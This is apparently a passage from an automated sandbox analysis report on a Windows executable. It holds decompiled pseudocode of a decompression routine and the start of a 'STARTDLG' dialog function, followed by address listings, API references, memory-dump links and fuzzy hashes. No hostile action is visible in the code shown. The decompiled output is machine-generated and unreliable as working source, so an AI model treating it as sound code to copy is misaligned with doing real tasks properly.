																 *_t934 =  *_t934 + (_t787 >> 3);
																_t905 = _a4;
																 *(_t934 + 4) = _t787 & 0x00000007;
																_t789 = 0x10;
																_t630 = (_t627 -  *((intOrPtr*)(_t936 + 0x1e6c + _a4 * 4)) >> _t789 - _a4) +  *((intOrPtr*)(_t936 + 0x1eb0 + _t905 * 4));
																__eflags = _t630 -  *((intOrPtr*)(_t936 + 0x1e6c));
																if(_t630 >=  *((intOrPtr*)(_t936 + 0x1e6c))) {
																	_t630 = 0;
																	__eflags = 0;
																}
																_t631 =  *(_t936 + 0x2af4 + _t630 * 2) & 0x0000ffff;
																L128:
																__eflags = _t631 - 0x10;
																if(_t631 != 0x10) {
																	_t683 = _t683 + _t631;
																	 *(_t936 + 0x98c8) = _t631;
																	goto L132;
																}
																 *(_t936 + 0x98cc) = 0xf;
																goto L116;
															}
															_t791 = _t936 + 0x1e70 + _t902 * 4;
															while(1) {
																__eflags = _t627 -  *_t791;
																if(_t627 <  *_t791) {
																	break;
																}
																_t902 = _t902 + 1;
																_t791 = _t791 + 4;
																__eflags = _t902 - 0xf;
																if(_t902 < 0xf) {
																	continue;
																}
																goto L125;
															}
															_a4 = _t902;
															goto L125;
														}
														_t792 = 0x10;
														_t632 = _t627 >> _t792 - _t901;
														_t795 = ( *(_t632 + _t936 + 0x1ef4) & 0x000000ff) +  *(_t934 + 4);
														 *_t934 =  *_t934 + (_t795 >> 3);
														 *(_t934 + 4) = _t795 & 0x00000007;
														_t631 =  *(_t936 + 0x22f4 + _t632 * 2) & 0x0000ffff;
														goto L128;
													} else {
														_t633 = _t625 - 1;
														__eflags = _t633;
														 *(_t936 + 0x98cc) = _t633;
														L116:
														_t683 = _t683 +  *(_t936 + 0x98c8);
														goto L132;
													}
												}
											}
											_t852 =  *(_t936 + 0x70);
											 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) = _t545;
											L95:
											 *(_t936 + 0x70) =  *(_t936 + 0x70) + 1;
											continue;
										}
										_t702 = _t936 + 0x98 + _t706 * 4;
										while(1) {
											__eflags = _t541 -  *_t702;
											if(_t541 <  *_t702) {
												break;
											}
											_t706 = _t706 + 1;
											_t702 = _t702 + 4;
											__eflags = _t706 - 0xf;
											if(_t706 < 0xf) {
												continue;
											}
											goto L90;
										}
										_t852 = _t706;
										goto L90;
									}
									_t814 = 0x10;
									_t644 = _t541 >> _t814 - _t681;
									_t817 = ( *(_t644 + _t936 + 0x11c) & 0x000000ff) +  *(_t934 + 4);
									_t852 = _t817 >> 3;
									 *_t934 =  *_t934 + (_t817 >> 3);
									 *(_t934 + 4) = _t817 & 0x00000007;
									_t545 =  *(_t936 + 0x51c + _t644 * 2) & 0x0000ffff;
									goto L93;
								}
								_t683 = E0041366A(_t936 + 0x98d0);
								if(_t683 == 0xffffffff) {
									E004135A1(_t936 + 0x98d0, _t852);
									_t535 = _t936 + 0xe670;
									 *_t535 =  *(_t936 + 0xe670) & 0x00000000;
									__eflags =  *_t535;
									break;
								}
								if(_t683 !=  *((intOrPtr*)(_t936 + 0xe4bc))) {
									L81:
									 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) = _t683;
									goto L95;
								}
								_t648 = E0041397A(_t936);
								if(_t648 != 0) {
									__eflags = _t648 - 0xffffffff;
									if(_t648 == 0xffffffff) {
										break;
									}
									__eflags = _t648 - 2;
									if(_t648 == 2) {
										break;
									}
									__eflags = _t648 - 3;
									if(__eflags != 0) {
										__eflags = _t648 - 4;
										if(_t648 != 4) {
											__eflags = _t648 - 5;
											if(_t648 != 5) {
												goto L81;
											}
											_t649 = E0041397A(_t936);
											__eflags = _t649 - 0xffffffff;
											if(_t649 == 0xffffffff) {
												break;
											}
											_a4 = _t649 + 4;
											_t651 =  *(_t936 + 0x70);
											_t852 = _t651 - 1;
											_t825 =  *((intOrPtr*)(_t936 + 0xe6f4)) + 0xffffefff;
											__eflags = _t852 - _t825;
											if(_t852 >= _t825) {
												L77:
												__eflags = _a4;
												if(_a4 <= 0) {
													continue;
												}
												_t826 =  *(_t936 + 0xe6f8);
												do {
													_t683 =  *(_t936 + 0x70);
													_a4 = _a4 - 1;
													 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t826 & _t852) +  *((intOrPtr*)(_t936 + 0x4b34))));
													_t826 =  *(_t936 + 0xe6f8);
													_t852 = _t852 + 1;
													__eflags = _a4;
													 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t826;
												} while (_a4 > 0);
												continue;
											}
											__eflags = _t651 - _t825;
											if(_t651 >= _t825) {
												goto L77;
											}
											_t829 =  *((intOrPtr*)(_t936 + 0x4b34));
											_t683 = _t829 + _t852;
											_v8 = _t829 + _t651;
											_t831 = _a4;
											 *(_t936 + 0x70) = _t651 + _t831;
											__eflags = _t831 - 1;
											if(_t831 <= 1) {
												__eflags = _t831 - 8;
												if(_t831 < 8) {
													goto L51;
												}
												_t658 = _a4 >> 3;
												__eflags = _t658;
												_v16 = _t658;
												do {
													E0041BB80(_t683, _t934, _t936, _v8, _t683, 8);
													_v8 = _v8 + 8;
													_a4 = _a4 - 8;
													_t937 = _t937 + 0xc;
													_t683 = _t683 + 8;
													_t144 =  &_v16;
													 *_t144 = _v16 - 1;
													__eflags =  *_t144;
												} while ( *_t144 != 0);
												goto L51;
											}
											__eflags = _t831 - 8;
											if(_t831 < 8) {
												goto L51;
											}
											_t660 = _v8;
											_t832 = _t831 >> 3;
											__eflags = _t832;
											do {
												_a4 = _a4 - 8;
												 *_t660 =  *_t683;
												 *((char*)(_t660 + 1)) =  *((intOrPtr*)(_t683 + 1));
												 *((char*)(_t660 + 2)) =  *((intOrPtr*)(_t683 + 2));
												 *((char*)(_t660 + 3)) =  *((intOrPtr*)(_t683 + 3));
												 *((char*)(_t660 + 4)) =  *((intOrPtr*)(_t683 + 4));
												 *((char*)(_t660 + 5)) =  *((intOrPtr*)(_t683 + 5));
												 *((char*)(_t660 + 6)) =  *((intOrPtr*)(_t683 + 6));
												_t852 =  *((intOrPtr*)(_t683 + 7));
												 *((char*)(_t660 + 7)) =  *((intOrPtr*)(_t683 + 7));
												_t683 = _t683 + 8;
												_t660 = _t660 + 8;
												_t832 = _t832 - 1;
												__eflags = _t832;
											} while (_t832 != 0);
											goto L47;
										} else {
											_t684 = 0;
											__eflags = 0;
											_a7 = 0;
											_v16 = 0;
											while(1) {
												__eflags = _a7;
												if(_a7 != 0) {
													goto L223;
												}
												_t661 = E0041397A(_t936);
												__eflags = _t661 - 0xffffffff;
												if(_t661 != 0xffffffff) {
													__eflags = _v16 - 3;
													_t662 = _t661 & 0x000000ff;
													if(_v16 != 3) {
														_t684 = (_t684 << 8) + _t662;
														__eflags = _t684;
													} else {
														_v20 = _t662;
													}
												} else {
													_a7 = 1;
												}
												_v16 = _v16 + 1;
												__eflags = _v16 - 4;
												if(_v16 < 4) {
													continue;
												} else {
													__eflags = _a7;
													if(_a7 != 0) {
														goto L223;
													}
													_t834 =  *(_t936 + 0x70);
													_t49 = _t684 + 2; // 0x2
													_t921 = _t49;
													_a4 = _v20 + 0x20;
													_t666 = _t834 - _t921;
													_v16 = _t921;
													_t852 =  *((intOrPtr*)(_t936 + 0xe6f4)) + 0xffffefff;
													__eflags = _t666 - _t852;
													if(_t666 >= _t852) {
														L60:
														__eflags = _a4;
														if(_a4 > 0) {
															_t923 =  *(_t936 + 0xe6f8);
															do {
																_t683 =  *(_t936 + 0x70);
																_a4 = _a4 - 1;
																 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t923 & _t666) +  *((intOrPtr*)(_t936 + 0x4b34))));
																_t923 =  *(_t936 + 0xe6f8);
																_t666 = _t666 + 1;
																__eflags = _a4;
																 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t923;
															} while (_a4 > 0);
														}
														goto L12;
													}
													__eflags = _t834 - _t852;
													if(_t834 >= _t852) {
														goto L60;
													}
													_t926 =  *((intOrPtr*)(_t936 + 0x4b34));
													_t683 = _t926 + _t666;
													_t667 = _a4;
													_t852 = _t926 + _t834;
													_v8 = _t852;
													 *(_t936 + 0x70) = _t834 + _t667;
													__eflags = _v16 - _t667;
													if(_v16 >= _t667) {
														__eflags = _t667 - 8;
														if(_t667 < 8) {
															L51:
															_t759 = _a4;
															__eflags = _t759;
															if(_t759 <= 0) {
																goto L12;
															} else {
																_t594 = _v8;
																goto L53;
															}
														} else {
															_t669 = _a4 >> 3;
															__eflags = _t669;
															_v16 = _t669;
															do {
																E0041BB80(_t683, _t934, _t936, _v8, _t683, 8);
																_v8 = _v8 + 8;
																_a4 = _a4 - 8;
																_t937 = _t937 + 0xc;
																_t683 = _t683 + 8;
																_t83 =  &_v16;
																 *_t83 = _v16 - 1;
																__eflags =  *_t83;
															} while ( *_t83 != 0);
															goto L51;
														}
													}
													__eflags = _t667 - 8;
													if(_t667 >= 8) {
														_t841 = _t667 >> 3;
														__eflags = _t841;
														_t671 = _t852;
														do {
															_a4 = _a4 - 8;
															 *_t671 =  *_t683;
															 *((char*)(_t671 + 1)) =  *((intOrPtr*)(_t683 + 1));
															 *((char*)(_t671 + 2)) =  *((intOrPtr*)(_t683 + 2));
															 *((char*)(_t671 + 3)) =  *((intOrPtr*)(_t683 + 3));
															 *((char*)(_t671 + 4)) =  *((intOrPtr*)(_t683 + 4));
															 *((char*)(_t671 + 5)) =  *((intOrPtr*)(_t683 + 5));
															 *((char*)(_t671 + 6)) =  *((intOrPtr*)(_t683 + 6));
															_t852 =  *((intOrPtr*)(_t683 + 7));
															 *((char*)(_t671 + 7)) =  *((intOrPtr*)(_t683 + 7));
															_t683 = _t683 + 8;
															_t671 = _t671 + 8;
															_t841 = _t841 - 1;
															__eflags = _t841;
														} while (_t841 != 0);
														L47:
														_v8 = _t660;
													}
													goto L51;
												}
											}
											break;
										}
									} else {
										_t598 = E004177C3(_t936, _t852, __eflags);
										goto L25;
									}
								} else {
									_t598 = E00413A24(_t936, _t852);
									goto L25;
								}
							} else {
								E00414AC4(_t936);
								_t673 =  *((intOrPtr*)(_t936 + 0x4c54));
								_t953 = _t673 -  *((intOrPtr*)(_t936 + 0x4c44));
								if(_t953 > 0) {
									L224:
									return _t673;
								}
								if(_t953 < 0) {
									L19:
									if( *((char*)(_t936 + 0x4c48)) != 0) {
										 *((char*)(_t936 + 0x4c58)) = 0;
										return _t673;
									}
									goto L20;
								}
								_t673 =  *((intOrPtr*)(_t936 + 0x4c50));
								if(_t673 >  *((intOrPtr*)(_t936 + 0x4c40))) {
									goto L224;
								}
								goto L19;
							}
						}
						L223:
						_t599 = E00414AC4(_t936); // executed
						return _t599;
					}
					E0041530F(_t936, _a4);
					_t673 = E00411E9F(_t680, _t936, _t849);
					if(_t673 == 0) {
						goto L224;
					}
					if(_a4 == 0 ||  *((char*)(_t936 + 0xe674)) == 0) {
						_t673 = E00413A24(_t936, _t849);
						if(_t673 == 0) {
							goto L224;
						}
					}
					goto L11;
				} else {
					_v12 = 0;
					_t935 = 0;
					do {
						_t852 =  *(0x42f1c8 + _t680 * 4);
						if(_t852 > 0) {
							_t4 = _t935 + 0x44eb78; // 0x44eb78
							_v16 = 1;
							_v16 = _v16 << _t680;
							_v8 = _t852;
							E0041A110(_t935, _t4, _t680, _t852);
							_t937 = _t937 + 0xc;
							do {
								_t678 = _v12;
								 *((intOrPtr*)(0x44ebb8 + _t935 * 4)) = _t678;
								_t935 = _t935 + 1;
								_t13 =  &_v8;
								 *_t13 = _v8 - 1;
								_v12 = _t678 + _v16;
							} while ( *_t13 != 0);
						}
						_t680 = _t680 + 1;
					} while (_t680 < 0x13);
					goto L6;
				}
			}

0x0041789c
0x0041789f
0x004178a1
0x004178a7
0x004178f5
0x004178fc
0x00417903
0x0041793c
0x0041793c
0x0041793f
0x0041793f
0x00417945
0x0041794d
0x00000000
0x00000000
0x0041795e
0x00417961
0x00417968
0x00417974
0x004179b4
0x004179bb
0x00417d1c
0x00417d21
0x00417d27
0x00417d2c
0x00417d33
0x00417d60
0x00417d61
0x00417d64
0x00417d66
0x00417d80
0x00417d83
0x00417d8a
0x00417d8d
0x00417d90
0x00417d9b
0x00417da0
0x00417da7
0x00417dad
0x00417daf
0x00417daf
0x00417daf
0x00417db1
0x00417db9
0x00417dbe
0x00417dc0
0x00417dd6
0x00417ddb
0x00418164
0x00418166
0x00418174
0x00418179
0x00418187
0x0041818c
0x004182a2
0x004182a7
0x0041851b
0x00418520
0x00000000
0x00000000
0x00418532
0x00418539
0x0041853a
0x0041853d
0x0041853f
0x00418543
0x0041854a
0x00418550
0x00418555
0x0041855d
0x0041855f
0x0041855f
0x00418562
0x00418562
0x00418568
0x00418571
0x00418577
0x0041857d
0x00418582
0x00418583
0x00418586
0x0041858b
0x0041858d
0x00418593
0x00418596
0x00418598
0x004185bd
0x004185bd
0x004185c3
0x004185c9
0x004185cc
0x004185d4
0x004185da
0x004185e0
0x004185e4
0x004185e8
0x004185e8
0x0041859a
0x0041859a
0x0041859c
0x00000000
0x00000000
0x0041859e
0x004185a4
0x004185a6
0x004185ab
0x004185b0
0x004185b5
0x004185b5
0x00000000
0x00418598
0x004182ad
0x004182b2
0x004182b6
0x004182b8
0x004182c6
0x004182c6
0x004182c8
0x00000000
0x00000000
0x004182c0
0x004182c2
0x004182c3
0x004182c3
0x004182c3
0x004182cc
0x004182cf
0x004182d4
0x004182da
0x004182df
0x004182e6
0x00418313
0x00418314
0x00418315
0x00418317
0x00418331
0x00418334
0x0041833b
0x00418341
0x0041834c
0x00418351
0x00418358
0x0041835e
0x00418360
0x00418360
0x00418360
0x00418362
0x0041836a
0x00418371
0x00418379
0x0041837a
0x0041837d
0x00418380
0x00418382
0x00418386
0x0041838d
0x00418393
0x00418398
0x0041839b
0x004183a3
0x004183a5
0x004183a5
0x004183a8
0x004183a8
0x004183ab
0x004183b6
0x004183b9
0x004183bf
0x004183c2
0x004183c5
0x004183c7
0x004184de
0x004184de
0x004184e0
0x00000000
0x00000000
0x004184e6
0x004184ec
0x004184f2
0x004184f5
0x004184fd
0x00418503
0x00418509
0x0041850d
0x00418511
0x00418511
0x00000000
0x004183cd
0x004183cd
0x004183cf
0x00000000
0x00000000
0x004183d5
0x004183db
0x004183de
0x004183e1
0x004183e5
0x004183e8
0x004183eb
0x004183ee
0x0041843c
0x0041843f
0x00418468
0x00418468
0x0041846c
0x00418472
0x00418478
0x0041847b
0x0041847d
0x00418483
0x0041848a
0x0041848d
0x00418493
0x0041849a
0x0041849d
0x004184a3
0x004184aa
0x004184ad
0x004184b3
0x004184ba
0x004184bd
0x004184c3
0x004184ca
0x004184cd
0x004184d6
0x004184d6
0x004184cd
0x004184bd
0x004184ad
0x0041849d
0x0041848d
0x0041847d
0x00000000
0x0041846c
0x00418444
0x00418444
0x00418447
0x0041844a
0x00418450
0x00418455
0x00418459
0x0041845d
0x00418460
0x00418463
0x00418463
0x00418463
0x00418463
0x00000000
0x0041844a
0x004183f0
0x004183f3
0x00000000
0x00000000
0x004183f5
0x004183f5
0x004183f8
0x004183fa
0x004183fc
0x004183fe
0x00418402
0x00418407
0x0041840d
0x00418413
0x00418419
0x0041841f
0x00418425
0x00418428
0x0041842b
0x0041842e
0x00418431
0x00418434
0x00418434
0x00418434
0x00418437
0x00000000
0x00418437
0x004183c7
0x00418319
0x00418320
0x00418320
0x00418322
0x00000000
0x00000000
0x00418324
0x00418325
0x00418328
0x0041832b
0x00000000
0x00000000
0x00000000
0x0041832d
0x0041832f
0x00000000
0x0041832f
0x004182ea
0x004182ed
0x004182f7
0x004182ff
0x00418304
0x00418307
0x00000000
0x00418307
0x00418192
0x00418195
0x00418197
0x00000000
0x00000000
0x0041819d
0x004181a3
0x004181a8
0x004181b0
0x004181b6
0x004181b8
0x00418263
0x00418263
0x00418267
0x00000000
0x00000000
0x0041826d
0x00418273
0x00418279
0x0041827c
0x00418284
0x0041828a
0x00418290
0x00418294
0x00418298
0x00418298
0x00000000
0x0041829d
0x004181be
0x004181c0
0x00000000
0x00000000
0x004181c6
0x004181cc
0x004181cf
0x004181d2
0x004181d6
0x004181d9
0x004181dc
0x004181df
0x00418231
0x00418234
0x00418112
0x00418112
0x00418115
0x00418117
0x00000000
0x00000000
0x0041811d
0x00417b48
0x00417b48
0x00417b4a
0x00417b4c
0x00417b4f
0x00417b55
0x00417b58
0x00417b5b
0x00417b5e
0x00417b64
0x00417b67
0x00417b6a
0x00417b6d
0x00417b73
0x00417b76
0x00417b79
0x00417b7c
0x00417b82
0x00417b85
0x00417b88
0x00417b8b
0x00417b91
0x00417b94
0x00417b97
0x00417b9a
0x00417ba3
0x00417ba3
0x00417b9a
0x00417b8b
0x00417b7c
0x00417b6d
0x00417b5e
0x00000000
0x00417b4f
0x0041823a
0x0041823a
0x0041823d
0x00418240
0x00418246
0x0041824b
0x0041824f
0x00418253
0x00418256
0x00418259
0x00418259
0x00418259
0x00418259
0x00000000
0x0041825e
0x004181e1
0x004181e4
0x00000000
0x00000000
0x004181ec
0x004181ec
0x004181ef
0x004181f1
0x004181f3
0x004181f7
0x004181fc
0x00418202
0x00418208
0x0041820e
0x00418214
0x0041821a
0x0041821d
0x00418220
0x00418223
0x00418226
0x00418229
0x00418229
0x00418229
0x004180e1
0x004180e1
0x00000000
0x004180e1
0x0041817d
0x004179f5
0x004179f7
0x00000000
0x004179fd
0x00000000
0x004179fd
0x004179f7
0x0041816a
0x00000000
0x0041816a
0x00417ded
0x00417df4
0x00417df7
0x00417dfa
0x00417dfd
0x00417dff
0x00417e03
0x00417e0a
0x00417e15
0x00417e18
0x00417e20
0x00417e22
0x00417e22
0x00417e25
0x00417e25
0x00417e2a
0x00417e2f
0x00417e35
0x00417e3a
0x00417e41
0x00417e6e
0x00417e6f
0x00417e72
0x00417e74
0x00417e8e
0x00417e91
0x00417e98
0x00417e9e
0x00417ea9
0x00417eae
0x00417eb5
0x00417ebb
0x00417ebd
0x00417ebd
0x00417ebd
0x00417ebf
0x00000000
0x00417ebf
0x00417e76
0x00417e7d
0x00417e7d
0x00417e7f
0x00000000
0x00000000
0x00417e81
0x00417e82
0x00417e85
0x00417e88
0x00000000
0x00000000
0x00000000
0x00417e8a
0x00417e8c
0x00000000
0x00417e43
0x00417e45
0x00417e48
0x00417e52
0x00417e5a
0x00417e5f
0x00417e62
0x00417ec7
0x00417ec7
0x00417ed5
0x00417ed6
0x00417ed9
0x00417edc
0x00417ede
0x00418026
0x00418026
0x0041802c
0x0041802e
0x00418031
0x00418037
0x00418039
0x00418039
0x00418039
0x00418039
0x00418037
0x0041803f
0x00418048
0x0041804e
0x00418054
0x00418057
0x0041805a
0x0041805d
0x00418062
0x00418064
0x0041806a
0x0041806d
0x0041806f
0x00418125
0x00418125
0x00418129
0x00000000
0x00000000
0x0041812f
0x00418135
0x0041813b
0x0041813e
0x00418146
0x0041814c
0x00418152
0x00418156
0x0041815a
0x0041815a
0x00000000
0x00418075
0x00418075
0x00418077
0x00000000
0x00000000
0x0041807d
0x00418083
0x00418086
0x00418089
0x0041808d
0x00418090
0x00418093
0x00418096
0x004180e6
0x004180e9
0x00000000
0x00000000
0x004180ee
0x004180ee
0x004180f1
0x004180f4
0x004180fa
0x004180ff
0x00418103
0x00418107
0x0041810a
0x0041810d
0x0041810d
0x0041810d
0x0041810d
0x00000000
0x004180f4
0x0041809a
0x0041809b
0x0041809d
0x00000000
0x00000000
0x0041809f
0x0041809f
0x004180a2
0x004180a5
0x004180a7
0x004180a9
0x004180ac
0x004180b1
0x004180b7
0x004180bd
0x004180c3
0x004180c9
0x004180cf
0x004180d2
0x004180d5
0x004180d8
0x004180da
0x004180dc
0x004180dc
0x004180dc
0x004180dc
0x00000000
0x004180a7
0x0041806f
0x00417ee4
0x00417ee7
0x00418001
0x00418008
0x0041800e
0x00418013
0x0041801b
0x0041801d
0x0041801d
0x00418020
0x00418023
0x00418023
0x00000000
0x00418023
0x00417eed
0x00417ef0
0x00417ef4
0x00417efb
0x00417f00
0x00417f08
0x00417f14
0x00417f16
0x00417f18
0x00417f18
0x00417f1b
0x00417f1b
0x00417f1e
0x00417f24
0x00417f26
0x00417f3c
0x00417f41
0x00417f47
0x00417f4c
0x00417f53
0x00417f7e
0x00417f7f
0x00417f86
0x00417f89
0x00417fa4
0x00417fa7
0x00417fb1
0x00417fb3
0x00417fb9
0x00417fc3
0x00417fc8
0x00417fcf
0x00417fd5
0x00417fd7
0x00417fd7
0x00417fd7
0x00417fd9
0x00417fe1
0x00417fe1
0x00417fe4
0x00417ff5
0x00417ff7
0x00000000
0x00417ff7
0x00417fe6
0x00000000
0x00417fe6
0x00417f8b
0x00417f92
0x00417f92
0x00417f94
0x00000000
0x00000000
0x00417f96
0x00417f97
0x00417f9a
0x00417f9d
0x00000000
0x00000000
0x00000000
0x00417f9f
0x00417fa1
0x00000000
0x00417fa1
0x00417f57
0x00417f5a
0x00417f64
0x00417f6c
0x00417f71
0x00417f74
0x00000000
0x00417f28
0x00417f28
0x00417f28
0x00417f29
0x00417f2f
0x00417f2f
0x00000000
0x00417f2f
0x00417f26
0x00417e41
0x00417dc8
0x00417dcb
0x00417dce
0x00417dce
0x00000000
0x00417dce
0x00417d68
0x00417d6f
0x00417d6f
0x00417d71
0x00000000
0x00000000
0x00417d73
0x00417d74
0x00417d77
0x00417d7a
0x00000000
0x00000000
0x00000000
0x00417d7c
0x00417d7e
0x00000000
0x00417d7e
0x00417d37
0x00417d3a
0x00417d44
0x00417d49
0x00417d4c
0x00417d51
0x00417d54
0x00000000
0x00417d54
0x004179cc
0x004179d1
0x00418601
0x00418606
0x00418606
0x00418606
0x00000000
0x00418606
0x004179dd
0x00417d09
0x00417d12
0x00000000
0x00417d12
0x004179e5
0x004179ec
0x00417a02
0x00417a05
0x00000000
0x00000000
0x00417a0b
0x00417a0e
0x00000000
0x00000000
0x00417a14
0x00417a17
0x00417a22
0x00417a25
0x00417bea
0x00417bed
0x00000000
0x00000000
0x00417bf5
0x00417bfa
0x00417bfd
0x00000000
0x00000000
0x00417c0c
0x00417c0f
0x00417c12
0x00417c15
0x00417c1b
0x00417c1d
0x00417cca
0x00417cca
0x00417cce
0x00000000
0x00000000
0x00417cd4
0x00417cda
0x00417ce0
0x00417ce3
0x00417ceb
0x00417cf1
0x00417cf7
0x00417cfb
0x00417cff
0x00417cff
0x00000000
0x00417d04
0x00417c23
0x00417c25
0x00000000
0x00000000
0x00417c2b
0x00417c31
0x00417c36
0x00417c39
0x00417c3e
0x00417c41
0x00417c44
0x00417c95
0x00417c98
0x00000000
0x00000000
0x00417ca1
0x00417ca1
0x00417ca4
0x00417ca7
0x00417cad
0x00417cb2
0x00417cb6
0x00417cba
0x00417cbd
0x00417cc0
0x00417cc0
0x00417cc0
0x00417cc0
0x00000000
0x00417cc5
0x00417c46
0x00417c49
0x00000000
0x00000000
0x00417c4f
0x00417c52
0x00417c52
0x00417c55
0x00417c57
0x00417c5b
0x00417c60
0x00417c66
0x00417c6c
0x00417c72
0x00417c78
0x00417c7e
0x00417c81
0x00417c84
0x00417c87
0x00417c8a
0x00417c8d
0x00417c8d
0x00417c8d
0x00000000
0x00417a2b
0x00417a2b
0x00417a2b
0x00417a2d
0x00417a30
0x00417a33
0x00417a33
0x00417a37
0x00000000
0x00000000
0x00417a3f
0x00417a44
0x00417a47
0x00417a4f
0x00417a53
0x00417a56
0x00417a60
0x00417a60
0x00417a58
0x00417a58
0x00417a58
0x00417a49
0x00417a49
0x00417a49
0x00417a62
0x00417a65
0x00417a69
0x00000000
0x00417a6b
0x00417a6b
0x00417a6f
0x00000000
0x00000000
0x00417a78
0x00417a7e
0x00417a7e
0x00417a81
0x00417a86
0x00417a88
0x00417a91
0x00417a97
0x00417a99
0x00417bab
0x00417bab
0x00417baf
0x00417bb5
0x00417bbb
0x00417bc1
0x00417bc4
0x00417bcc
0x00417bd2
0x00417bd8
0x00417bdc
0x00417be0
0x00417be0
0x00417be5
0x00000000
0x00417baf
0x00417a9f
0x00417aa1
0x00000000
0x00000000
0x00417aa7
0x00417aad
0x00417ab0
0x00417ab3
0x00417ab7
0x00417aba
0x00417abd
0x00417ac0
0x00417b0e
0x00417b11
0x00417b3a
0x00417b3a
0x00417b3d
0x00417b3f
0x00000000
0x00417b45
0x00417b45
0x00000000
0x00417b45
0x00417b13
0x00417b16
0x00417b16
0x00417b19
0x00417b1c
0x00417b22
0x00417b27
0x00417b2b
0x00417b2f
0x00417b32
0x00417b35
0x00417b35
0x00417b35
0x00417b35
0x00000000
0x00417b1c
0x00417b11
0x00417ac2
0x00417ac5
0x00417ac9
0x00417ac9
0x00417acc
0x00417ace
0x00417ad0
0x00417ad4
0x00417ad9
0x00417adf
0x00417ae5
0x00417aeb
0x00417af1
0x00417af7
0x00417afa
0x00417afd
0x00417b00
0x00417b03
0x00417b06
0x00417b06
0x00417b06
0x00417b09
0x00417b09
0x00417b09
0x00000000
0x00417ac5
0x00417a69
0x00000000
0x00417a33
0x00417a19
0x00417a1b
0x00000000
0x00417a1b
0x004179ee
0x004179f0
0x00000000
0x004179f0
0x0041797a
0x0041797c
0x00417981
0x00417987
0x0041798d
0x00418618
0x00418618
0x00418618
0x00417993
0x004179a7
0x004179ae
0x004185f2
0x00000000
0x004185f2
0x00000000
0x004179ae
0x00417995
0x004179a1
0x00000000
0x00000000
0x00000000
0x004179a1
0x00417974
0x0041860d
0x0041860f
0x00000000
0x0041860f
0x0041790a
0x00417911
0x00417918
0x00000000
0x00000000
0x00417922
0x0041792f
0x00417936
0x00000000
0x00000000
0x00417936
0x00000000
0x004178a9
0x004178a9
0x004178ac
0x004178ae
0x004178ae
0x004178b7
0x004178ba
0x004178c3
0x004178ca
0x004178ce
0x004178d1
0x004178d6
0x004178d9
0x004178d9
0x004178dc
0x004178e6
0x004178e7
0x004178e7
0x004178ea
0x004178ea
0x004178d9
0x004178ef
0x004178f0
0x00000000
0x004178ae

APIs

_memset.LIBCMT ref: 004178D1

Part of subcall function 004176B3: __EH_prolog.LIBCMT ref: 004176B8

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memset
String ID:
API String ID: 1619290041-0
Opcode ID: d2713e915bb4752ef295308573ddd72f1b77dac76f8a44637fd670c3e4d9f331
Instruction ID: 1e19bdc0112d4d6f57333fb3c634bb315df7aaf14c5e9a9060673e44ab518b59
Opcode Fuzzy Hash: d2713e915bb4752ef295308573ddd72f1b77dac76f8a44637fd670c3e4d9f331
Instruction Fuzzy Hash: F39206705087859FCB29CF34C5D06E9BBF2AF55308F18C4AED8968B352C738A985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2B8, Relevance: 105.6, APIs: 49, Strings: 11, Instructions: 629
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F2B8(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t103;
				void* _t105;
				long _t106;
				long _t107;
				struct HWND__* _t109;
				WCHAR* _t114;
				void* _t118;
				int _t120;
				void* _t129;
				void* _t132;
				void* _t153;
				struct HWND__* _t156;
				void* _t167;
				void* _t170;
				void* _t172;
				struct HWND__* _t178;
				intOrPtr _t187;
				WCHAR* _t188;
				long _t193;
				void* _t213;
				void* _t215;
				void* _t223;
				void* _t236;
				long _t238;
				long _t239;
				long _t240;
				void* _t245;
				void* _t249;
				intOrPtr _t263;
				intOrPtr _t269;
				void* _t277;
				long _t280;
				int _t282;
				struct HWND__* _t288;
				void* _t290;
				void* _t292;
				void* _t297;

				_t297 = __fp0;
				_t274 = __edx;
				_t261 = __ecx;
				E00419DD4(E00429316, _t290);
				E0041A3E0(0x9c78);
				_t288 =  *(_t290 + 8);
				_t103 = E00406056(__edx, _t288,  *(_t290 + 0xc),  *(_t290 + 0x10),  *(_t290 + 0x14), L"STARTDLG", 0, 0); // executed
				if(_t103 == 0) {
					_t105 =  *(_t290 + 0xc) - 0x110;
					__eflags = _t105;
					if(_t105 == 0) {
						_t106 =  *0x438cd4;
						 *0x440cf4 = _t288;
						 *0x440cf8 = _t288;
						__eflags = _t106;
						if(_t106 != 0) {
							SendMessageW(_t288, 0x80, 1, _t106); // executed
						}
						_t107 =  *0x438cd0;
						__eflags = _t107;
						if(__eflags != 0) {
							SendDlgItemMessageW(_t288, 0x6c, 0x172, 0, _t107); // executed
						}
						E0040D8AE(_t274, __eflags, _t297, _t288);
						_t109 = GetDlgItem(_t288, 0x68);
						 *(_t290 + 0x14) = _t109;
						SendMessageW(_t109, 0x435, 0, 0x400000);
						E00419740(_t290 - 0x1148, 0x800);
						 *(_t290 + 0x10) = GetDlgItem(_t288, 0x66);
						_t114 = 0x440d32;
						__eflags =  *0x440d32;
						if( *0x440d32 == 0) {
							_t114 = _t290 - 0x1148;
						}
						SetWindowTextW( *(_t290 + 0x10), _t114);
						E00419757( *(_t290 + 0x10)); // executed
						_push(0x440d0c);
						_push(0x440d00);
						_push(0x438cd8);
						_push(_t288);
						 *0x440cfc = 0; // executed
						E0040E48A(_t261, _t274, __eflags); // executed
						__eflags =  *0x440d0c;
						if( *0x440d0c > 0) {
							_push(7);
